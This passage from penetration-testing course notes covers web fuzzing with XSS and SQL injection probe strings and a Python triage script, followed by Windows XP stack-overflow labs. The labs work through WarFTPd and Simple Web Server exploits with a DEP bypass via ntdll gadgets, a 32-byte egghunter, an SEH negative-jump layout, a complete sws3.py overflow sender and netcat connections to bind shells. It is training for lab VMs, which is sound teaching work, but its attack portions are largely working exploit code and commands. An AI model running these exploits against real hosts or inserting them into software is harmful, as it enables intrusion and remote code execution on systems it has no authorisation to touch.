http://www.site.com/page.aspx?parametername=parametervalue

When you are looking at an individual request, Burp Suite will by default insert the payload in place of the parameter value, like this:

http://www.site.com/page.aspx?parametername=[ payload ]

You need to send the payload this way, AND appended to the original value, like this:

http://www.site.com/page.aspx?parametername=parametervalue[ payload ]

Why both? Replacing the value tells you whether the parameter is handled at all; appending to it keeps the request on the code path the real value reaches (a valid id, an existing username), which is usually where the injectable query or template lives. This little hint will pay huge dividends in actually EXPLOITING the vulnerabilities you find instead of just identifying them.

###########################################
# Question 2: How much fuzzing is enough? #
###########################################
There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.

Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.

Step 1: Ask yourself the 3 questions for each page of the site.

Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter).

Step 3: When you load your fuzz strings, use the following decision tree:

    - Are the fuzz strings causing a default error message (for example a generic 404 or 400 page)?
        - If so, the parameter is most likely NOT vulnerable; move on.

    - Are the fuzz strings causing a WAF or load balancer custom error message (block page, "request rejected", a support ID)?
        - If so, your input is reaching a filter, not the application. You need to find an encoding (URL, double-URL, Unicode, case changes) that gets past it before you can say anything about the parameter.

    - Are the fuzz strings causing an error message that discloses the backend type (MySQL, MS SQL, Oracle, etc.)?
        - If yes, identify the DB type and use that backend's syntax to confirm and exploit.
        - Some example strings that I use are:
            '
            "
            ()          <----- Take the parameter value and wrap it in parentheses
            (5-1)       <----- See if the backend evaluates arithmetic (the page should behave as if you had sent 4)

    - Are the fuzz strings rendering as HTML or executing as script?
        - If yes, report the injection: XSS when it renders in the page body, HTTP response splitting when the payload lands in a response header. CSRF and request smuggling are separate findings that a rendered fuzz string does not demonstrate; test for those on their own.
        - Some example strings that I use are:
            <b>hello</b>
            <u>hello</u>
            <script>alert(123);</script>
            <script>alert(/xss/);</script>     <----- quote-free variant; a bare alert(xss) would throw, since xss is undefined
            <script>alert('xss');</script>
            <script>alert("xss");</script>

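To make the decision tree and the Step 2b placement tip concrete, here is an added Python 3 example (not from the original notes) that builds both payload placements for a parameter and classifies each response the way the tree does. The error-message signatures and the canned responses are constructed for illustration; real testing loads fuzzdb's error lists, and fetch() is a stand-in for Burp or a real HTTP client.

```python
import html
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Constructed signature set: a handful of well-known error strings per backend.
# Assumption: for real work you load fuzzdb's "errors" lists instead.
DB_ERRORS = {
    "mysql":    re.compile(r"You have an error in your SQL syntax|mysql_fetch_", re.I),
    "mssql":    re.compile(r"Unclosed quotation mark|OLE DB Provider for SQL Server", re.I),
    "oracle":   re.compile(r"\bORA-\d{5}\b"),
    "postgres": re.compile(r"unterminated quoted string|pg_query\(\)", re.I),
}
WAF_OR_LB = re.compile(r"request rejected|support id|mod_security|not acceptable", re.I)


def payload_variants(url, param, payload):
    """The Step 2b tip: one request with the payload in place of the value,
    one with it appended to the original value. Returns (replaced, appended)."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    if param not in dict(pairs):
        raise ValueError("parameter %r is not in the query string" % param)

    def rebuild(mode):
        q = [(k, (payload if mode == "replace" else v + payload) if k == param else v)
             for k, v in pairs]
        # leave the fuzz characters readable so the URL matches what Intruder shows
        return urlunsplit(parts._replace(query=urlencode(q, safe="'\"()<>/;=-")))

    return rebuild("replace"), rebuild("append")


def classify(payload, status, body):
    """Walk the decision tree for one response. Order matters: a WAF/LB block
    page says nothing about the application, so it is checked first; a database
    error beats a reflection check; a reflected payload only counts if it came
    back unencoded; a bare default error (400/404) means move on."""
    if WAF_OR_LB.search(body):
        return "waf_or_lb_block: find an encoding that gets past the filter"
    for backend, rx in DB_ERRORS.items():
        if rx.search(body):
            return "db_error:%s: switch to that backend's syntax" % backend
    if payload in body:
        return "reflected_raw: candidate HTML/script injection"
    escaped = html.escape(payload, quote=True)
    if escaped != payload and escaped in body:
        return "reflected_encoded: output encoding in place, probably safe"
    if status in (400, 404):
        return "default_error: most likely not vulnerable"
    if status >= 500:
        return "server_error: nothing disclosed, investigate by hand"
    return "no_signal"


def triage(url, param, payloads, fetch):
    """Send every payload both ways and classify each answer. fetch(url) must
    return (status, body); it is injected so this runs offline (a real one
    wraps requests or Burp)."""
    results = []
    for payload in payloads:
        for variant in payload_variants(url, param, payload):
            status, body = fetch(variant)
            results.append((variant, classify(payload, status, body)))
    return results


# Constructed sample target: canned responses keyed by the payload in the URL.
SAMPLE_RESPONSES = {
    "'": (500, "Warning: mysql_fetch_array(): You have an error in your SQL syntax"),
    "()": (200, "<p>No results found.</p>"),
    "<b>hello</b>": (200, "<div>You searched for <b>hello</b></div>"),
    "<script>alert(123);</script>": (403, "The requested URL was rejected. Your support ID is: 1234"),
}


def fake_fetch(url):
    """Offline stand-in for an HTTP client; answers from SAMPLE_RESPONSES."""
    for payload, response in SAMPLE_RESPONSES.items():
        if payload in url:
            return response
    return (404, "Not Found")


if __name__ == "__main__":
    for url, verdict in triage("http://www.site.com/page.aspx?parametername=parametervalue",
                               "parametername", list(SAMPLE_RESPONSES), fake_fetch):
        print("%-75s %s" % (url, verdict))
```

The classifier is deliberately ordered: a block page or a database error is a property of the infrastructure or the backend and must be recognised before you read anything into the body echoing your payload back.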
-------------------------------------------------------------------------------------------
OWASP Top 10 Video Explanations

The numbering below follows the 2013 edition of the OWASP Top 10.

Burp Suite Reference:
https://support.portswigger.net/customer/portal/articles/1969845-using-burp-to-test-for-the-owasp-top-ten

A1: Injection Vulnerabilities
https://www.youtube.com/watch?v=9CnpHT5Nn8c&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj

A2: Broken Authentication and Session Management
https://www.youtube.com/watch?v=R1iGRBG3PJ8&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=2

A3: Cross Site Scripting (XSS)
https://www.youtube.com/watch?v=90XT0j5E7xo&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=4

A4: Insecure Direct Object Reference
https://www.youtube.com/watch?v=bMYpGj2xzpM&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=5

A5: Security Misconfiguration
https://www.youtube.com/watch?v=ouuXu9_UM0w&index=7&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj

A6: Sensitive Data Exposure
https://www.youtube.com/watch?v=x-B8I420x7Y&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=8

A7: Missing Function Level Access Control and A8: Cross-Site Request Forgery (CSRF)
https://www.youtube.com/watch?v=gf6cb7MnP-c&index=9&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj

A9: Using Components with Known Vulnerabilities and A10: Unvalidated Redirects and Forwards
https://www.youtube.com/watch?v=WqlSl-Pc1vk&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=10


Day 2
=-------------------------------------------------------------------------

###########################
# Lab 1a: Stack Overflows #
###########################

    #################################
    # Start WarFTPd                 #
    # Start WinDBG                  #
    # Press F6                      #
    # Attach to war-ftpd.exe        #
    #################################

---------------------------Type This-----------------------------------
c:\python27\python.exe warftpd1.py XPSP3-ED-Target-IP
-----------------------------------------------------------------------

    At the WinDBG prompt:
    "r" shows the registers (or press Alt+4 for the Registers window)

---------------------------Type This-----------------------------------
    0:003> dd eip
    0:003> dd esp
-----------------------------------------------------------------------

warftpd1.py just triggers the crash. warftpd2.py sends the same overflow filled with a Metasploit cyclic pattern (pattern_create.rb), in which every 4-byte window is unique, so the values that land in EIP and at ESP can be mapped back to offsets in our buffer:

---------------------------Type This-----------------------------------
c:\python27\python.exe warftpd2.py XPSP3-ED-Target-IP
-----------------------------------------------------------------------

    At the WinDBG prompt:
    "r" shows the registers (or press Alt+4)

---------------------------Type This-----------------------------------
    0:003> dd eip
    0:003> dd esp
-----------------------------------------------------------------------

    EIP: 32714131
    ESP: 00affd58, and the dword at ESP is 71413471

    Now we need to SSH into the StrategicSec Ubuntu host and look both values up in the pattern:

---------------------------Type This-----------------------------------
    cd /usr/share/metasploit-framework/tools/exploit/

    ./pattern_offset.rb -q 32714131
    485

    ./pattern_offset.rb -q 71413471
    493
-----------------------------------------------------------------------

    Distance to EIP is:             485
    Relative position of ESP is:    493

    So the saved return address is bytes 485-488 of our buffer, and when the function returns ESP points at byte 493. The 4 bytes in between (489-492) are never popped and never executed; keep that gap in mind when laying out the payload.

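An added example, not from the course material: a Python 3 re-implementation of what pattern_create.rb and pattern_offset.rb do, so you can see why 32714131 maps to 485 and 71413471 to 493 (and why ESP sitting 8 bytes past EIP leaves 4 bytes that are never popped). The SWS values from Lab 2a (225 and 229) are checked as well. Only the Metasploit pattern scheme is assumed; the numbers are the ones printed in the labs.

```python
import string
import struct

_UPPER, _LOWER, _DIGIT = string.ascii_uppercase, string.ascii_lowercase, string.digits
MAX_UNIQUE = len(_UPPER) * len(_LOWER) * len(_DIGIT) * 3   #  20280 bytes before the pattern repeats


def pattern_create(length):
    """Same scheme as Metasploit's pattern_create.rb: Aa0Aa1Aa2...Az9Ba0...
    Every 4-byte window is unique within the first 20280 bytes."""
    if not 0 < length <= MAX_UNIQUE:
        raise ValueError("length must be 1..%d for a unique pattern" % MAX_UNIQUE)
    out = bytearray()
    for u in _UPPER:
        for l in _LOWER:
            for d in _DIGIT:
                out += (u + l + d).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(value, length=MAX_UNIQUE):
    """value is what the debugger showed: an int (dd eip -> 0x32714131) or the
    raw 4 bytes. Registers hold little-endian dwords, so 0x32714131 is the
    bytes '1Aq2' in the buffer. Returns the 0-based offset, or None."""
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    idx = pattern_create(length).find(needle)
    return None if idx < 0 else idx


def eip_esp_gap(eip_offset, esp_offset):
    """Bytes between the end of the overwritten return address and the dword
    ESP points at after the RET. 0 means ESP points right after it."""
    gap = esp_offset - (eip_offset + 4)
    if gap < 0:
        raise ValueError("ESP cannot point inside the return address")
    return gap


if __name__ == "__main__":
    # values from the WarFTPd (Lab 1a) and SWS (Lab 2a) crashes
    for name, val in (("WarFTPd EIP", 0x32714131), ("WarFTPd [ESP]", 0x71413471),
                      ("SWS EIP", 0x41356841), ("SWS [ESP]", 0x68413668)):
        print("%-14s %08x -> offset %s" % (name, val, pattern_offset(val)))
    print("WarFTPd: %d junk bytes between EIP and ESP" % eip_esp_gap(485, 493))
    print("SWS:     %d junk bytes between EIP and ESP" % eip_esp_gap(225, 229))
```

Note that 41414141 ("AAAA") is never found: the pattern alternates upper, lower, digit, so a crash that still shows 41414141 after sending the pattern means the bytes that reached EIP did not come from the pattern part of the buffer.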
    RET      pops the top of the stack into EIP
    RET 4    pops the top of the stack into EIP, then adds 4 more to ESP (one extra dword is discarded)

    Next we need the address of a "JMP ESP" (or equivalent) in a module that is loaded at the same address every time. XP has no ASLR, so shell32.dll is a good candidate. Copy shell32.dll from the target into a DLLs directory on the Ubuntu host and scan it with msfpescan:

---------------------------Type This-----------------------------------
    wget https://raw.githubusercontent.com/pwnieexpress/metasploit-framework/master/msfpescan
    chmod +x msfpescan
    mkdir DLLs
    (copy c:\windows\system32\shell32.dll from the XP target into DLLs/)
    ./msfpescan -j ESP DLLs/shell32.dll
-----------------------------------------------------------------------

        0x7c9c167d push esp; retn 0x304d
        0x7c9d30d7 jmp esp < - how about we use this one
        0x7c9d30eb jmp esp
        0x7c9d30ff jmp esp

    "push esp; retn" would also get us to ESP, but the retn 0x304d then moves ESP a long way; the plain jmp esp is simpler. Also check the address for bad characters for this protocol: 0x7c9d30d7 contains no 0x00, 0x0a or 0x0d.

        Open warftpd3.py with Notepad++
        Fill in the appropriate values:
        Distance to EIP (485)
        Address of JMP ESP (0x7c9d30d7), which has to be written little-endian into the buffer (struct.pack('<I', 0x7c9d30d7))

---------------------------Type This-----------------------------------
c:\python27\python.exe warftpd3.py XPSP3-ED-Target-IP

    0:003> dd eip
    0:003> dd esp
-----------------------------------------------------------------------

    warftpd3.py uses INT3 bytes (\xCC) in place of shellcode: if WinDBG breaks on an int 3 and dd esp shows cccccccc, the jump to ESP works and the bytes at ESP are ours.

    Bad characters: before dropping in real shellcode, find the bytes this target mangles. 0x00 is always out; for FTP, 0x0a and 0x0d end the command; other bytes may be filtered or translated. Send every byte value 0x01-0xff after the return address, compare what arrives in memory (dd esp) with what you sent, and hand anything missing or changed to the encoder (msfvenom -b '\x00\x0a\x0d...').

    No debugger: do the final run without WinDBG attached. A debugger can mask problems (a slightly different stack, exceptions it swallows), so the exploit has to work against the bare service.

---------------------------Type This-----------------------------------
c:\python27\python.exe warftpd4.py XPSP3-ED-Target-IP

nc XPSP3-ED-Target-IP 4444
-----------------------------------------------------------------------

###########################################
# Lab 1b: Stack Overflows with DEP Bypass #
###########################################

Reboot your target host and choose the "2nd" boot option (the one with DEP turned on).

The crash analysis is the same as in Lab 1a; only the exploit body changes.

---------------------------Type This-----------------------------------
c:\python27\python.exe warftpd1.py XPSP3-ED-Target-IP

    At the WinDBG prompt:
    "r" shows the registers (or press Alt+4)
    dd esp

c:\python27\python.exe warftpd2.py XPSP3-ED-Target-IP

    At the WinDBG prompt:
    "r" shows the registers (or press Alt+4)
    dd esp
-----------------------------------------------------------------------

    EIP: 32714131
    ESP: 00affd58, and the dword at ESP is 71413471

    Now we need to SSH into the StrategicSec Ubuntu host. On this lab's VM Metasploit lives under /home/strategicsec/toolz, so the paths differ from Lab 1a:

---------------------------Type This-----------------------------------
    cd /home/strategicsec/toolz/metasploit/tools

    ruby pattern_offset.rb 32714131
    485

    ruby pattern_offset.rb 71413471
    493

    cd /home/strategicsec/toolz/metasploit/

    ./msfpescan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7      <----- confirm the JMP ESP from Lab 1a is still there
-----------------------------------------------------------------------

---------------------------Type This-----------------------------------
c:\python27\python.exe warftpd3.py XPSP3-ED-Target-IP

    0:003> dd eip
    0:003> dd esp
-----------------------------------------------------------------------

INT3s - GOOD!!!!!!! (dd eip shows our cc bytes: the jmp esp still lands on the buffer. With DEP on, expect WinDBG to report an access violation at that stack address rather than a clean breakpoint, because the stack page is not executable.)

---------------------------Type This-----------------------------------
c:\python27\python.exe warftpd4.py XPSP3-ED-Target-IP

nc XPSP3-ED-Target-IP 4444
-----------------------------------------------------------------------

strategicsec....exploit no workie!!!!

Why????????? DEP!!!!!!!!!!!!!

The stack is non-executable, so the moment EIP lands in our buffer the CPU faults. We still control EIP, so instead of jumping to the shellcode we return into code that already exists in the process and switch DEP off for this process (the Skape/Skywing NtSetInformationProcess technique): ntdll's LdrpCheckNXCompatibility routine calls NtSetInformationProcess(ProcessExecuteFlags) with MEM_EXECUTE_OPTION_ENABLE when it decides a module is not NX-compatible. We only have to enter that routine with the right register state.

Let's look through ole32.dll for the following instructions:

mov al,0x1
ret 0x4

We need AL set to 0x1 before we reach the LdrpCheckNXCompatibility code path.

---------------------------Type This-----------------------------------
./msfpescan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll
-----------------------------------------------------------------------

[DLLs/xpsp3/ole32.dll]
0x775ee00e b001c204
0x775ee00e      mov al, 1
0x775ee010      ret 4

Then we need to jump to the LdrpCheckNXCompatibility routine in ntdll.dll that disables DEP.

Inside of ntdll.dll we need to find the following instructions:

CMP AL,1
PUSH 2
POP ESI
JE ntdll.7

---------------------------Type This-----------------------------------
./msfpescan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll
-----------------------------------------------------------------------

[DLLs/xpsp3/ntdll.dll]
0x7c91cd24 3c016a025e0f84
0x7c91cd24      cmp al, 1
0x7c91cd26      push 2
0x7c91cd28      pop esi
0x7c91cd29      jz 7

This sequence checks that AL is 1, loads ESI with 2 (the MEM_EXECUTE_OPTION_ENABLE flag the routine passes to NtSetInformationProcess), and, because we arranged AL == 1, the jz is taken into the code that makes the call and disables DEP for war-ftpd.exe.

Now put the two addresses at the EIP position of the buffer. Remember from the offsets that ESP is 8 bytes past EIP, so the dword right after the return address is never popped, and "ret 4" throws away one more dword after it pops the ntdll address:

---------------------------Type This-----------------------------------
dep  = "\x0e\xe0\x5e\x77"   # bytes 485-488: EIP <- 0x775ee00e (mov al,1 ; ret 4)
dep += "\xff\xff\xff\xff"   # bytes 489-492: skipped, ESP is already past them
dep += "\x24\xcd\x91\x7c"   # bytes 493-496: popped by the ret, EIP <- 0x7c91cd24 (cmp al,1 ...)
dep += "\xff\xff\xff\xff"   # bytes 497-500: discarded by the "4" of ret 4
dep += "A"*0x54             # filler for the routine's own stack frame

c:\python27\python.exe warftpd5.py XPSP3-ED-Target-IP

nc XPSP3-ED-Target-IP 4444
-----------------------------------------------------------------------

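An added Python 3 example (not one of the course scripts) that lays out the DEP-bypass buffer from the offsets and gadget addresses found above and replays the two returns, so you can see exactly which dwords the function's RET and the gadget's RET 4 consume, and compare that with the Lab 1a jmp esp case where nothing is popped. The filler byte and the comparison case are the example's own choices; the addresses and offsets are the lab's.

```python
import struct

# Values taken from the lab above
EIP_OFFSET, ESP_OFFSET = 485, 493     # pattern_offset.rb results
JMP_ESP      = 0x7c9d30d7             # shell32.dll (Lab 1a)
MOV_AL1_RET4 = 0x775ee00e             # ole32.dll : mov al,1 ; ret 4
NX_CHECK     = 0x7c91cd24             # ntdll.dll : cmp al,1 ; push 2 ; pop esi ; jz ...


def p32(value):
    """Little-endian dword, the way an address has to sit in the buffer."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def build_overflow(eip_offset, esp_offset, first_gadget, at_esp, filler=b"\xff"):
    """pad | first_gadget at eip_offset | filler up to esp_offset | at_esp.
    The filler covers the dwords ESP has already moved past when the function
    returns (here bytes 489-492): they are never popped and never executed."""
    if esp_offset < eip_offset + 4:
        raise ValueError("ESP offset must lie past the overwritten return address")
    buf = b"A" * eip_offset + p32(first_gadget)
    buf += filler * (esp_offset - len(buf))
    return buf + at_esp


def simulate_rets(buf, eip_offset, esp_offset, ret_imm):
    """Replay the returns. The vulnerable function's RET loads the dword at
    eip_offset. Every address in ret_imm is a gadget ending in RET imm16: it
    pops the next EIP from ESP, then discards imm16 more bytes. Stops at the
    first address that is not a listed gadget. Returns (eip_trace, esp)."""
    eip = struct.unpack("<I", buf[eip_offset:eip_offset + 4])[0]
    esp = esp_offset
    trace = [eip]
    while eip in ret_imm:
        imm = ret_imm[eip]
        eip = struct.unpack("<I", buf[esp:esp + 4])[0]
        esp += 4 + imm
        trace.append(eip)
    return trace, esp


def dep_bypass_buffer(frame_filler=b"A" * 0x54):
    """Lab 1b: return into mov al,1 ; ret 4, then into the ntdll NX check."""
    at_esp = p32(NX_CHECK) + p32(0xFFFFFFFF) + frame_filler
    return build_overflow(EIP_OFFSET, ESP_OFFSET, MOV_AL1_RET4, at_esp)


def jmp_esp_buffer(shellcode):
    """Lab 1a for comparison: nothing is popped, the bytes at ESP are executed."""
    return build_overflow(EIP_OFFSET, ESP_OFFSET, JMP_ESP, shellcode)


# The dep string exactly as the lab wrote it, for comparison
PAGE_DEP = (b"\x0e\xe0\x5e\x77" + b"\xff\xff\xff\xff" +
            b"\x24\xcd\x91\x7c" + b"\xff\xff\xff\xff" + b"A" * 0x54)

if __name__ == "__main__":
    buf = dep_bypass_buffer()
    trace, esp = simulate_rets(buf, EIP_OFFSET, ESP_OFFSET, {MOV_AL1_RET4: 4})
    print("EIP trace:", ["%08x" % a for a in trace], "ESP ends at offset", esp)
```

Running it shows the trace 775ee00e, 7c91cd24 and ESP ending at offset 501, i.e. at the first of the 0x54 filler bytes; that is the state LdrpCheckNXCompatibility starts in.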
########################################
# Lab 2a: Not Enough Space (Egghunter) #
########################################
-----------------------------------------------------------------------

SWS - SIMPLE WEB SERVER
-----------------------

Running SWS on Strategicsec-XP-ED-Target-VM
Start > Programs > Simple Web Server (it's in the middle somewhere)
Red icon in system tray
Double click it
- it will pop up a menu
- select "start"
- dialog box shows starting params - port 82

WinDBG
- attach to "server.exe"

---------------------------Type This-----------------------------------
c:\python27\python.exe  sws1.py XPSP3-ED-Target-IP

    0:003> dd eip
    0:003> dd esp

c:\python27\python.exe  sws2.py XPSP3-ED-Target-IP

    0:003> dd eip
    0:003> dd esp

SSH into the Ubuntu host (user: strategicsec / pass: strategicsec)
cd /home/strategicsec/toolz/metasploit/tools
ruby pattern_offset.rb 41356841             <------- You should see that EIP is at 225
ruby pattern_offset.rb 68413668             <------- You should see that ESP is at 229
-----------------------------------------------------------------------

The problem: the URL buffer leaves only a few bytes after the return address, not enough for a real payload. The fix is to put a tiny search stub (an egghunter) in the space we have and park the big shellcode somewhere else in the request (a header) that still ends up in process memory. The hunter walks memory looking for an 8-byte marker and jumps to whatever follows it.

EGGHUNTER (32 bytes, Skape's NtAccessCheckAndAuditAlarm hunter):
----------

"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
          ^^^^^^^^^^^^^^^^
               ABBA   (mov eax,0x41424241: the 4-byte tag, in the order it appears in memory)

How it works: "or dx,0x0fff / inc edx" moves EDX to the start of the next page; the int 0x2e system call (EAX=2, NtAccessCheckAndAuditAlarm on XP) makes the kernel touch that address for us, and a return status whose low byte is 0x05 (0xC0000005, STATUS_ACCESS_VIOLATION) means the page is unmapped, so the whole page is skipped instead of crashing; otherwise scasd compares the tag against [EDI] twice, and on a double match "jmp edi" lands right after the egg.

                                         JMP ESP lands here
                                        /
                                       /
GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0
User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)

The tag is written twice ("ABBAABBA") so the hunter does not match the single copy of the tag inside its own mov eax instruction.

-----sws3.py-----
#!/usr/bin/python2
import sys
import socket
import struct  # for pack

if len(sys.argv) < 2:
    sys.stderr.write("Usage: sws3.py <host>\n")
    sys.exit(1)

target = sys.argv[1]
port = 82

pad = "A" * 225        # distance to EIP
eip = 0x7e429353       # "jmp esp" in user32.dll (XP SP3); overwrites the saved return address

# 32-byte egghunter: searches memory for the 8-byte egg "ABBAABBA" and jumps past it
egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"

# stand-in payload: 700 INT3s, so reaching the egg is visible in WinDBG (swap in real shellcode later)
shellcode = "\xCC" * 700

buf = "GET /"
buf += pad + struct.pack('<I', eip) + egghunter   # jmp esp lands on the hunter, which sits right at ESP
buf += " HTTP/1.0\r\n"
buf += "User-Agent: ABBAABBA"                     # the egg, immediately followed by the payload
buf += shellcode
buf += " HTTP/1.0\r\n"                            # terminates the header line

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # TCP
# s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # UDP

try:
    s.connect((target, port))
    s.sendall(buf)
    sys.stderr.write("Sent.\n")
except Exception as e:
    sys.stderr.write("Cannot send to " + str(target) + ":" + str(port) + " : " + str(e) + "!\n")
finally:
    s.close()
-----

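Added example (Python 3, not from the course files): builds the 32-byte hunter for any 4-byte tag, models its search over a flat byte image, and assembles the Lab 2a request layout. It reproduces the hunter bytes above for the tag ABBA; the request builder ends the headers with a blank line, which is this example's choice rather than what sws3.py sends.

```python
import struct

# Skape's NtAccessCheckAndAuditAlarm egghunter (Windows x86), minus the tag.
# 66 81 ca ff 0f   or dx,0x0fff       ; EDX -> last byte of the current page
# 42               inc edx            ; ... i.e. first byte of the next page
# 52               push edx
# 6a 02 / 58       push 2 ; pop eax   ; EAX = NtAccessCheckAndAuditAlarm syscall number (XP)
# cd 2e            int 0x2e           ; let the kernel touch [EDX]
# 3c 05            cmp al,5           ; low byte of 0xc0000005 -> page unmapped
# 5a               pop edx
# 74 ef            je 0x00            ; unmapped: skip to the next page
HUNTER_HEAD = bytes.fromhex("6681caff0f42526a0258cd2e3c055a74ef")
# b8 <tag>         mov eax,tag        ; inserted by build_egghunter
# 8b fa            mov edi,edx
# af               scasd              ; [EDI] == EAX ?  (EDI += 4)
# 75 ea            jne 0x05           ; no: next address (inc edx)
# af               scasd              ; second copy of the tag?
# 75 e7            jne 0x05
# ff e7            jmp edi            ; EDI is now just past the 8-byte egg
HUNTER_TAIL = bytes.fromhex("8bfaaf75eaaf75e7ffe7")

# the bytes as printed in the lab, for comparison
PAGE_HUNTER = (b"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
               b"\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")


def build_egghunter(tag):
    """32-byte hunter looking for tag+tag. The tag goes into the mov eax
    immediate in memory order, so the bytes in the hunter read like the egg."""
    if len(tag) != 4:
        raise ValueError("tag must be exactly 4 bytes")
    return HUNTER_HEAD + b"\xb8" + tag + HUNTER_TAIL


def tag_as_imm32(tag):
    """The value the hunter loads into EAX: b'ABBA' in memory is 0x41424241."""
    return struct.unpack("<I", tag)[0]


def egg(tag):
    """The 8-byte marker that has to sit directly in front of the payload."""
    return tag * 2


def find_egg(memory, tag, start=0):
    """Model of the search loop over a flat byte image: two scasd at every
    address, success when both dwords match. Returns the offset execution
    would continue at (jmp edi), or None. The hunter cannot match itself
    because it holds the tag only once."""
    idx = memory.find(egg(tag), start)
    return None if idx < 0 else idx + 8


def build_request(distance_to_eip, jmp_esp, tag, shellcode, pad_byte=b"A"):
    """Lab 2a layout: the hunter rides in the URL right after the return
    address (where jmp esp lands), the egg and the payload go in a header."""
    req = b"GET /" + pad_byte * distance_to_eip + struct.pack("<I", jmp_esp)
    req += build_egghunter(tag) + b" HTTP/1.0\r\n"
    req += b"User-Agent: " + egg(tag) + shellcode + b"\r\n\r\n"   # blank line ends the headers (example's choice)
    return req


if __name__ == "__main__":
    tag = b"ABBA"
    req = build_request(225, 0x7e429353, tag, b"\xcc" * 700)
    print("hunter matches the lab bytes:", build_egghunter(tag) == PAGE_HUNTER)
    print("payload would start at request offset", find_egg(req, tag))
```

Since the hunter only ever compares the 4-byte tag, pick one that cannot occur by accident in the process (not "AAAA", not part of the padding) and keep the egg and payload contiguous in whatever field carries them.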
############################################
# Lab 2b: Not Enough Space (Negative Jump) #
############################################

-----------------------------------------------------------------------

This is an SEH overwrite where the shellcode has to live BEFORE the SEH record, because there is not enough room after it. Layout of the buffer:

[pad = distance_to_seh - len(shellcode)] [shellcode] [nSEH: jmp4 = "\x90\x90\xEB\x04"] [SEH handler: address of a POP POP RET] [jmp_min = "\xE9\x98\xEF\xFF\xFF"]

1. Overflow the buffer: everything up to and past the SEH record is ours.
2. The access violation fires and Windows calls our "handler", the POP POP RET. The two POPs drop the first two dwords on the stack, and the RET lands on the address of the nSEH field, so execution starts at the \x90\x90\xEB\x04 bytes.
3. jmp short +4 (EB 04) hops over the 4-byte handler address that sits right after nSEH.
4. jmp_min is a 5-byte near jump with a negative displacement (E9 rel32, here 0xFFFFEF98 = -0x1068 = -4200 bytes) back into the NOPs in front of the shellcode; from there execution slides into the shellcode.

The displacement is relative to the end of the E9 instruction, so rel32 = (offset of the first NOP) - (offset of jmp_min + 5). Recompute it whenever the shellcode length changes.

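Added example, not from the original notes: the SEH layout above built programmatically in Python 3, with the short and near jumps computed from the offsets rather than hard-coded, so jmp_min is right whatever size the shellcode ends up. The distance_to_seh and the pop-pop-ret address used when running it are hypothetical; the lab only gives the jump bytes themselves.

```python
import struct


def short_jmp(delta):
    """EB rel8: delta is measured from the end of this 2-byte instruction."""
    if not -128 <= delta <= 127:
        raise ValueError("short jump out of range")
    return b"\xeb" + struct.pack("<b", delta)


def near_jmp(delta):
    """E9 rel32: delta is measured from the end of this 5-byte instruction."""
    return b"\xe9" + struct.pack("<i", delta)


def jump_target(buf, at):
    """Decode the EB/E9 jump at offset `at` and return the offset it lands on."""
    op = buf[at]
    if op == 0xEB:
        return at + 2 + struct.unpack("<b", buf[at + 1:at + 2])[0]
    if op == 0xE9:
        return at + 5 + struct.unpack("<i", buf[at + 1:at + 5])[0]
    raise ValueError("no jmp at offset %d" % at)


def build_seh_buffer(distance_to_seh, shellcode, pop_pop_ret, nops=16):
    """[pad][NOP sled][shellcode][nSEH: 90 90 EB 04][SEH: pop pop ret][E9 back]
    Returns (buffer, offsets); offsets names each piece so it can be checked."""
    body = b"\x90" * nops + shellcode
    if len(body) > distance_to_seh:
        raise ValueError("shellcode does not fit before the SEH record")
    pad = b"A" * (distance_to_seh - len(body))
    nseh = b"\x90\x90" + short_jmp(4)          # hop over the 4-byte handler address
    seh = struct.pack("<I", pop_pop_ret)       # little-endian, like every address
    jmp_at = distance_to_seh + 8               # right after the SEH record
    sled_at = len(pad)
    jmp_back = near_jmp(sled_at - (jmp_at + 5))
    buf = pad + body + nseh + seh + jmp_back
    offsets = {"sled": sled_at, "shellcode": sled_at + nops,
               "nseh": distance_to_seh, "seh": distance_to_seh + 4, "jmp_back": jmp_at}
    return buf, offsets


if __name__ == "__main__":
    # hypothetical numbers: 1000 bytes to the SEH record, a 300-byte payload
    buf, off = build_seh_buffer(1000, b"\xcc" * 300, 0x7e4300ff)
    print("jmp short at nSEH lands on offset", jump_target(buf, off["nseh"] + 2))
    print("jmp back lands on offset", jump_target(buf, off["jmp_back"]), "(sled at", off["sled"], ")")
    print("lab's jmp_min bytes:", near_jmp(-0x1068).hex())
```

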